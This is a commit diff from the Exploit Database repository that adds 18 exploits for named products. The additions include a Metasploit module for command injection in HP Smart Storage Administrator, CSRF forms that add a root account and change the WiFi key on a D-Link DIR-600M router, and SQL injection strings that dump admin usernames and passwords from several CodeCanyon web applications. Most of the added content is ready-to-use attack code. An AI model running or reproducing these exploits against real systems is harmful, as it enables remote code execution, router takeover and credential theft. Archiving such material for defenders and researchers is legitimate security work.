DB: 2017-02-11
18 new exploits Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell) Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell) HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit) F5 BIG-IP SSL Virtual Server - Memory Disclosure CMS Lite 1.3.1 - SQL Injection Tiger Post 3.0.1 - SQL Injection Gram Post 1.0 - SQL Injection Youtube Analytics Multi Channel 3.0 - SQL Injection Collabo - Arbitrary File Download Takas Classified 1.1 - SQL Injection Zigaform - SQL Injection Multilanguage Estate Agency Pro 1.2 - SQL Injection QWIKIA 1.1.1 - SQL Injection Automated Job Portal Script - SQL Injection CLUB-8 EMS - SQL Injection Uploadr - SQL Injection CodePaul ClipMass - SQL Injection Video Subscription - SQL Injection D-link DIR-600M - Cross-Site Request Forgery HotelCMS with Booking Engine - SQL Injection
This commit is contained in:
parent
a6133048b5
commit
dcc7720ad6
19 changed files with 586 additions and 1 deletions
20
files.csv
20
files.csv
|
@ -8600,7 +8600,7 @@ id,file,description,date,author,platform,type,port
|
|||
39694,platforms/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,local,0
|
||||
39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation (Metasploit)",2016-04-15,Metasploit,linux,local,0
|
||||
39967,platforms/linux/local/39967.txt,"SolarWinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0
|
||||
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
|
||||
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
|
||||
39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
|
||||
39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0
|
||||
39741,platforms/osx/local/39741.txt,"Mach Race OSX - Privilege Escalation",2016-04-27,fG!,osx,local,0
|
||||
|
@ -15264,6 +15264,8 @@ id,file,description,date,author,platform,type,port
|
|||
41162,platforms/linux/remote/41162.py,"Haraka < 2.8.9 - Remote Command Execution",2017-01-26,Xychix,linux,remote,0
|
||||
41233,platforms/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,linux,remote,0
|
||||
41236,platforms/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,hardware,remote,0
|
||||
41297,platforms/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,multiple,remote,0
|
||||
41298,platforms/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -37209,3 +37211,19 @@ id,file,description,date,author,platform,type,port
|
|||
41286,platforms/php/webapps/41286.txt,"SOA School Management - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
|
||||
41287,platforms/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
|
||||
41288,platforms/php/webapps/41288.txt,"EXAMPLO - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
|
||||
41290,platforms/php/webapps/41290.txt,"CMS Lite 1.3.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41291,platforms/php/webapps/41291.txt,"Tiger Post 3.0.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41292,platforms/php/webapps/41292.txt,"Gram Post 1.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41293,platforms/php/webapps/41293.txt,"Youtube Analytics Multi Channel 3.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41294,platforms/php/webapps/41294.txt,"Collabo - Arbitrary File Download",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41295,platforms/php/webapps/41295.txt,"Takas Classified 1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41296,platforms/php/webapps/41296.txt,"Zigaform - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41300,platforms/php/webapps/41300.txt,"Multilanguage Estate Agency Pro 1.2 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41301,platforms/php/webapps/41301.txt,"QWIKIA 1.1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41302,platforms/php/webapps/41302.txt,"Automated Job Portal Script - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41303,platforms/php/webapps/41303.txt,"CLUB-8 EMS - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41304,platforms/php/webapps/41304.txt,"Uploadr - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41305,platforms/php/webapps/41305.txt,"CodePaul ClipMass - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41306,platforms/php/webapps/41306.txt,"Video Subscription - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
|
||||
41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
12
platforms/hardware/remote/41298.txt
Executable file
12
platforms/hardware/remote/41298.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
/*
|
||||
# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
|
||||
# Date: [10.02.2017]
|
||||
# Exploit Author: [Ege Balcı]
|
||||
# Vendor Homepage: [https://f5.com/]
|
||||
# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
|
||||
# Tested on: [Multiple]
|
||||
# CVE : [CVE-2016-9244]
|
||||
|
||||
POC:
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip
|
92
platforms/hardware/webapps/41299.html
Executable file
92
platforms/hardware/webapps/41299.html
Executable file
|
@ -0,0 +1,92 @@
|
|||
# Exploit Title:D-link wireless router DIR-600M – Cross-Site Request Forgery (CSRF) vulnerability
|
||||
# Google Dork:N/A
|
||||
# Date: 07/02/2017
|
||||
# Exploit Author:Ajay S. Kulal (www.twitter.com/ajay_kulal)
|
||||
# Vendor Homepage:dlink.com
|
||||
# Software Link:N/A
|
||||
# Version:Hardware version: C1
|
||||
Firmware version: 3.03
|
||||
# Tested on:All Platforms
|
||||
# CVE :CVE-2017-5874
|
||||
|
||||
Abstract:
|
||||
=======
|
||||
|
||||
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-600M wireless router enables an attacker
|
||||
to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
|
||||
|
||||
|
||||
Exploitation-Technique:
|
||||
===================
|
||||
Remote
|
||||
|
||||
Severity Rating:
|
||||
===================
|
||||
|
||||
7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)
|
||||
|
||||
Details:
|
||||
=======
|
||||
An attacker who lures a DIR-600M authenticated user to browse a malicious website
|
||||
can exploit cross site request forgery (CSRF) to add new admin, change wifi password and to change other network settings.
|
||||
|
||||
Proof Of Concept code:
|
||||
====================
|
||||
|
||||
1. Add new user with root access
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC - by Ajay Kulal -->
|
||||
<body>
|
||||
<form action="http://192.168.0.1/form2userconfig.cgi" method="POST">
|
||||
<input type="hidden" name="username" value="AK" />
|
||||
<input type="hidden" name="privilege" value="2" />
|
||||
<input type="hidden" name="newpass" value="dolphin" />
|
||||
<input type="hidden" name="confpass" value="dolphin" />
|
||||
<input type="hidden" name="adduser" value="Add" />
|
||||
<input type="hidden" name="hiddenpass" value="" />
|
||||
<input type="hidden" name="submit.htm?userconfig.htm" value="Send" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|
||||
|
||||
2. changing wireless password
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC - by Ajay Kulal -->
|
||||
<body>
|
||||
<form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
|
||||
<input type="hidden" name="domain" value="1" />
|
||||
<input type="hidden" name="hiddenSSID" value="on" />
|
||||
<input type="hidden" name="ssid" value="Dravidian" />
|
||||
<input type="hidden" name="band" value="10" />
|
||||
<input type="hidden" name="chan" value="0" />
|
||||
<input type="hidden" name="chanwid" value="1" />
|
||||
<input type="hidden" name="txRate" value="0" />
|
||||
<input type="hidden" name="method_cur" value="0" />
|
||||
<input type="hidden" name="method" value="2" />
|
||||
<input type="hidden" name="authType" value="2" />
|
||||
<input type="hidden" name="length" value="1" />
|
||||
<input type="hidden" name="format" value="2" />
|
||||
<input type="hidden" name="defaultTxKeyId" value="1" />
|
||||
<input type="hidden" name="key1" value="0000000000" />
|
||||
<input type="hidden" name="pskFormat" value="0" />
|
||||
<input type="hidden" name="pskValue" value="password123" />
|
||||
<input type="hidden" name="checkWPS2" value="1" />
|
||||
<input type="hidden" name="save" value="Apply" />
|
||||
<input type="hidden" name="basicrates" value="15" />
|
||||
<input type="hidden" name="operrates" value="4095" />
|
||||
<input type="hidden" name="submit.htm?wlan_basic.htm" value="Send" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
|
||||
|
||||
|
178
platforms/multiple/remote/41297.rb
Executable file
178
platforms/multiple/remote/41297.rb
Executable file
|
@ -0,0 +1,178 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::CmdStager
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "HP Smart Storage Administrator Remote Command Injection",
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability found in HP Smart Storage Administrator. By
|
||||
supplying a specially crafted HTTP request, it is possible to control the
|
||||
'command' variable in function isDirectFileAccess (found in ipcelmclient.php),
|
||||
which will be used in a proc_open() function. Versions prior to HP SSA 2.60.18.0 are vulnerable.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Nicolas Mattiocco (@MaKyOtOx)' # Discovery & multi-platform Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2016-8523']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true
|
||||
},
|
||||
'Platform' => %w{ linux win },
|
||||
'Targets' =>
|
||||
[
|
||||
['Linux', {
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'CmdStagerFlavor' => 'bourne'
|
||||
}],
|
||||
['Linux (x64)', {
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86_64,
|
||||
'CmdStagerFlavor' => 'bourne'
|
||||
}],
|
||||
['Windows', {
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'CmdStagerFlavor' => 'certutil'
|
||||
}],
|
||||
['Windows (x64)', {
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86_64,
|
||||
'CmdStagerFlavor' => 'certutil'
|
||||
}],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Jan 30 2017"
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(2381),
|
||||
# USERNAME/PASS may not be necessary, because the anonymous access is possible
|
||||
OptString.new("USERNAME", [false, 'The username to authenticate as']),
|
||||
OptString.new("PASSWORD", [false, 'The password to authenticate with'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
|
||||
@cookie = ''
|
||||
|
||||
sig = Rex::Text.rand_text_alpha(8)
|
||||
cmd = "&echo%20#{sig}&echo"
|
||||
res = send_command(cmd, true)
|
||||
if not res
|
||||
vprint_error("#{peer} - Connection timed out")
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if res.code == 200 && res.headers.to_s() =~ /#{sig}/
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
def login
|
||||
username = datastore['USERNAME']
|
||||
password = datastore['PASSWORD']
|
||||
|
||||
cookie = ''
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => '/proxy/ssllogin',
|
||||
'vars_post' => {
|
||||
'redirecturl' => '',
|
||||
'redirectquerystring' => '',
|
||||
'user' => username,
|
||||
'password' => password
|
||||
}
|
||||
})
|
||||
|
||||
if not res
|
||||
fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
|
||||
end
|
||||
|
||||
# CpqElm-Login: success
|
||||
if res.headers['CpqElm-Login'].to_s =~ /success/
|
||||
cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
|
||||
end
|
||||
|
||||
cookie
|
||||
end
|
||||
|
||||
|
||||
def setup_stager
|
||||
execute_cmdstager(:temp => './', :linemax => 2800)
|
||||
end
|
||||
|
||||
|
||||
def execute_command(cmd, opts={})
|
||||
res = send_command(cmd, false)
|
||||
if res && res.code != 200
|
||||
vprint_error("Unexpected response:\n#{res}")
|
||||
fail_with(Failure::Unknown, "There was an unexpected response")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def send_command(cmd, check)
|
||||
if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
|
||||
@cookie = login
|
||||
if @cookie.empty?
|
||||
fail_with(Failure::NoAccess, "#{peer} - Login failed")
|
||||
else
|
||||
print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
|
||||
end
|
||||
end
|
||||
|
||||
req_opts = {}
|
||||
|
||||
# For the check() function, use GET method
|
||||
if check
|
||||
req_opts['uri'] = "/HPSSA/index.htm#{cmd}"
|
||||
req_opts['method'] = "GET"
|
||||
else
|
||||
req_opts['uri'] = "/HPSSA/index.htm"
|
||||
req_opts['method'] = "POST"
|
||||
req_opts['vars_post'] = {'msf'=>'red'}
|
||||
case target.opts['Platform']
|
||||
when "linux" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"/tmp/")} & echo \""
|
||||
when "win" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"\.\\")} & echo \""
|
||||
end
|
||||
end
|
||||
|
||||
unless @cookie.empty?
|
||||
browser_chk = 'HPSMH-browser-check=done for this session'
|
||||
curl_loc = "curlocation-#{datastore['USERNAME']}="
|
||||
req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
|
||||
end
|
||||
|
||||
send_request_cgi(req_opts)
|
||||
end
|
||||
|
||||
def exploit
|
||||
@cookie = ''
|
||||
|
||||
setup_stager
|
||||
end
|
||||
end
|
||||
|
18
platforms/php/webapps/41290.txt
Executable file
18
platforms/php/webapps/41290.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Creative Management System - CMS Lite v1.3.1 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://www.cmslite.co.uk/
|
||||
# Software Buy: https://codecanyon.net/item/creative-management-system-cms-lite/15297597
|
||||
# Demo: http://www.cmslite.co.uk/
|
||||
# Version: 1.3.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/?Style=[SQL]
|
||||
# Etc...
|
||||
# # # # #
|
20
platforms/php/webapps/41291.txt
Executable file
20
platforms/php/webapps/41291.txt
Executable file
|
@ -0,0 +1,20 @@
|
|||
# # # # #
|
||||
# Exploit Title: Tiger Post - Facebook Auto Post Multi Pages/Groups/Profiles v3.0.1 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://vtcreators.com/
|
||||
# Software Buy: https://codecanyon.net/item/tiger-post-facebook-auto-post-multi-pagesgroupsprofiles/15279075
|
||||
# Demo: http://demo.vtcreators.com/tigerpost/
|
||||
# Version: 3.0.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# Login as regular user
|
||||
# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
|
||||
# -999'+/*!50000union*/+select+1,2,3,4,group_concat(email,char(58),password),0x496873616e2053656e63616e,7,8,9,10,11,12+from+user_management-- -
|
||||
# Etc...
|
||||
# # # # #
|
20
platforms/php/webapps/41292.txt
Executable file
20
platforms/php/webapps/41292.txt
Executable file
|
@ -0,0 +1,20 @@
|
|||
# # # # #
|
||||
# Exploit Title: Gram Post - Instagram Auto Post Multi Accounts with Paypal integration v1.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://vtcreators.com/
|
||||
# Software Buy: https://codecanyon.net/item/gram-post-instagram-auto-post-multi-accounts-with-paypal-integration/19264650
|
||||
# Demo: http://demo.vtcreators.com/grampost/
|
||||
# Version: 1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# Login as regular user
|
||||
# http://localhost/[PATH]/index.php/instagram_accounts/update?id=[SQL]
|
||||
# -9999'+/*!50000union*/+select+group_concat(email,char(58),password),2,3,4,5,6+from+user_management-- -
|
||||
# Etc...
|
||||
# # # # #
|
19
platforms/php/webapps/41293.txt
Executable file
19
platforms/php/webapps/41293.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Youtube Analytics Multi Channel v3.0 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://vtcreators.com/
|
||||
# Software Buy: https://codecanyon.net/item/youtube-analytics-multi-channel/14720919
|
||||
# Demo: http://demo.vtcreators.com/yamc/
|
||||
# Version: 3.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# Login as regular user
|
||||
# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
|
||||
# Etc...
|
||||
# # # # #
|
19
platforms/php/webapps/41294.txt
Executable file
19
platforms/php/webapps/41294.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Collabo - TeamBusiness Collaboration Network - Arbitrary File Download
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://321-internet.com/
|
||||
# Software Buy: https://codecanyon.net/item/collabo-teambusiness-collaboration-network/15242543
|
||||
# Demo: http://321-internet.com/codecanyon/collabo/demo/collabo/index.php
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# Exploit :
|
||||
# Login as regular user
|
||||
# http://localhost/[PATH]/download.php?file_id=[FILE]&file_name=Ihsan_Sencan&file_type=php
|
||||
# Etc...
|
||||
# # # # #
|
23
platforms/php/webapps/41295.txt
Executable file
23
platforms/php/webapps/41295.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
# # # # #
|
||||
# Exploit Title: Takas Classified – Codeigniter PHP Classified Ad Script v1.1 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://artifectx.com/
|
||||
# Software Buy: https://codecanyon.net/item/takas-classified-codeigniter-php-classified-ad-script/15227824
|
||||
# Demo: http://takas.artifectx.com/
|
||||
# Version: 1.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php/classified_ads/ads/?&subcatid=[SQL]
|
||||
# http://localhost/[PATH]/index.php/classified_ads/ads/?&catid=[SQL]
|
||||
# http://localhost/[PATH]/index.php/classified_ads/ads/?&locid=[SQL]
|
||||
# http://localhost/[PATH]/index.php/classified_ads/ads/?&areaid=[SQL]
|
||||
# http://localhost/[PATH]/index.php/classified_ads/ads/?&type=[SQL]
|
||||
# http://localhost/[PATH]/index.php/classified_ads/ads/?&post=[SQL]
|
||||
# Etc... Etc...
|
||||
# # # # #
|
18
platforms/php/webapps/41296.txt
Executable file
18
platforms/php/webapps/41296.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Zigaform - PHP Form Builder - Contact & Survey v2.9.1 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://php-form-builder.zigaform.com/
|
||||
# Software Buy: https://codecanyon.net/item/zigaform-php-form-builder-contact-survey/14889427
|
||||
# Demo: http://demo-phpformbuilder.zigaform.com/index.php
|
||||
# Version: 2.9.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/formbuilder/frontend/viewform/?form=[SQL]
|
||||
# Etc...
|
||||
# # # # #
|
17
platforms/php/webapps/41300.txt
Executable file
17
platforms/php/webapps/41300.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: Multilanguage Estate Agency Pro 1.2 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://djrust26.hu/
|
||||
# Software Buy: https://codecanyon.net/item/multilanguage-estate-agency-pro-12/14521069
|
||||
# Demo: http://djrust26.hu/realestate/
|
||||
# Version: 1.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/property_show.php?id=[SQL]
|
||||
# # # # #
|
17
platforms/php/webapps/41301.txt
Executable file
17
platforms/php/webapps/41301.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
|
||||
# Exploit Title: QWIKIA - Ask And Answer Platform 1.1.1 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://xandr.co/
|
||||
# Software Buy: http://xandr.co/portfolio/qwikia
|
||||
# Demo: http://qwikia.xandr.co/
|
||||
# Version: 1.1.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/search?q=[SQL]
|
||||
# # # # #
|
23
platforms/php/webapps/41302.txt
Executable file
23
platforms/php/webapps/41302.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
# # # # #
|
||||
# Exploit Title: Automated Job Portal Script - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://www.jagaad.com/
|
||||
# Software Buy: https://codecanyon.net/item/automated-job-portal-script/14318664
|
||||
# Demo: http://www.jagaad.com/demo/php/automated-job-portal/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/jobdetail.php?id=[SQL]
|
||||
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
|
||||
#
|
||||
# http://localhost/[PATH]/search.php?keyword=1&location=[SQL]
|
||||
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
|
||||
#
|
||||
# http://localhost/[PATH]/search.php?keyword=a&location=&co=[SQL]
|
||||
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
|
22
platforms/php/webapps/41303.txt
Executable file
22
platforms/php/webapps/41303.txt
Executable file
|
@ -0,0 +1,22 @@
|
|||
# # # # #
|
||||
# Exploit Title: CLUB-8 EMS - Event Management System - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://rexbd.net/
|
||||
# Software Buy: https://codecanyon.net/item/club8-ems-event-management-system-a-to-z/14067759
|
||||
# Demo: http://ems.rexbd.net/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# Login as sales man user
|
||||
# http://localhost/[PATH]/editwatch.php?id=[SQL]
|
||||
-999'+/*!50000union*/+select+group_concat(username,char(58),password),0x496873616e2053656e63616e,0x7777772e696873616e2e6e6574,4,5,6,7,8,9,10,11,12,13,14+from+users-- -
|
||||
#
|
||||
# http://localhost/[PATH]/editwatch.php?id=[SQL]
|
||||
-999'+/*!50000union*/+select+1,group_concat(username,char(58),password)+from+users-- -
|
||||
# # # # #
|
18
platforms/php/webapps/41304.txt
Executable file
18
platforms/php/webapps/41304.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Uploadr - Project Files Management - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 10.02.2017
|
||||
# Vendor Homepage: http://lagunaproperty.com/
|
||||
# Software Buy: https://codecanyon.net/item/uploadr-project-files-management/13545125
|
||||
# Demo: http://download.lagunaproperty.com/
|
||||
# Version: N/A
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/search?keyword=[SQL]
|
||||
# http://localhost/[PATH]/download?file=[SQL]
|
||||
# # # # #
|
17
platforms/php/webapps/41305.txt
Executable file
17
platforms/php/webapps/41305.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# # # # #
